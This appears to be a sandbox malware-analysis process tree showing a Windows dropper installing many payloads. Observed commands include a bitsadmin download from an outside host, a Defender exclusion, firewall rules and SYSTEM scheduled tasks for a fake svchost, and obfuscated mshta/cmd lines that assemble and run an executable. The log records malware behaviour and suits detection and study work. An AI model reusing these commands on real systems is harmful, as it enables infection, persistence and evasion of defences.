C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1508 /prefetch:19⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514838⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515138⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872158⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631198⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942318⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\92-97740-3ca-03eac-420f6e3f85a38\Wofezhaxypi.exe"C:\Users\Admin\AppData\Local\Temp\92-97740-3ca-03eac-420f6e3f85a38\Wofezhaxypi.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 26010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exeC:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe /qn CAMPAIGN="654"9⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654358 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
- Enumerates connected drives
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exeC:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exe9⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 26010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exe /S9⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\a1sIMMdcjuk0TWWU00B_mdKO.exe"C:\Users\Admin\Pictures\Adobe Films\a1sIMMdcjuk0TWWU00B_mdKO.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7fffd258dec0,0x7fffd258ded0,0x7fffd258dee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff60b0a9e70,0x7ff60b0a9e80,0x7ff60b0a9e908⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,12584540835772529798,4965942559173619970,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2728_368073941" --mojo-platform-channel-handle=1720 /prefetch:87⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7M7Hn4tZ95KaqTur0so4Bmsu.exe"C:\Users\Admin\Pictures\Adobe Films\7M7Hn4tZ95KaqTur0so4Bmsu.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\L69DfgFoAllVllEy2jOxVIeu.exe"C:\Users\Admin\Pictures\Adobe Films\L69DfgFoAllVllEy2jOxVIeu.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yEIsgJfYOoWfBJEJNEoLkIc8.exe"C:\Users\Admin\Pictures\Adobe Films\yEIsgJfYOoWfBJEJNEoLkIc8.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 2563⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 2044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\g8fcyuzFoqvSg8OUP0tHcBoy.exe"C:\Users\Admin\Pictures\Adobe Films\g8fcyuzFoqvSg8OUP0tHcBoy.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\7qn4oO9BoLqPcXPnJsizWxHM.exe"C:\Users\Admin\Pictures\Adobe Films\7qn4oO9BoLqPcXPnJsizWxHM.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 15843⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gG966mdTjMQCGobSA1xfEzb7.exe"C:\Users\Admin\Pictures\Adobe Films\gG966mdTjMQCGobSA1xfEzb7.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\71hdwuYNuZsjLfxrzhnRb4Ls.exe"C:\Users\Admin\Pictures\Adobe Films\71hdwuYNuZsjLfxrzhnRb4Ls.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\N0NCDPohiNjHdlr2B2UqrBcW.exe"C:\Users\Admin\Pictures\Adobe Films\N0NCDPohiNjHdlr2B2UqrBcW.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
C:\Users\Admin\Pictures\Adobe Films\27nNpMIlNTg7B__qK3RO47JE.exe"C:\Users\Admin\Pictures\Adobe Films\27nNpMIlNTg7B__qK3RO47JE.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\DKAkDeyF1LExOxO6TrKZ5_B7.exe"C:\Users\Admin\Pictures\Adobe Films\DKAkDeyF1LExOxO6TrKZ5_B7.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\E8b5UKJ6STYQ0e00s7p6lTHo.exe"C:\Users\Admin\Pictures\Adobe Films\E8b5UKJ6STYQ0e00s7p6lTHo.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ztFLqZo8tsSQFc1wqHeNc22m.exe"C:\Users\Admin\Pictures\Adobe Films\ztFLqZo8tsSQFc1wqHeNc22m.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
-
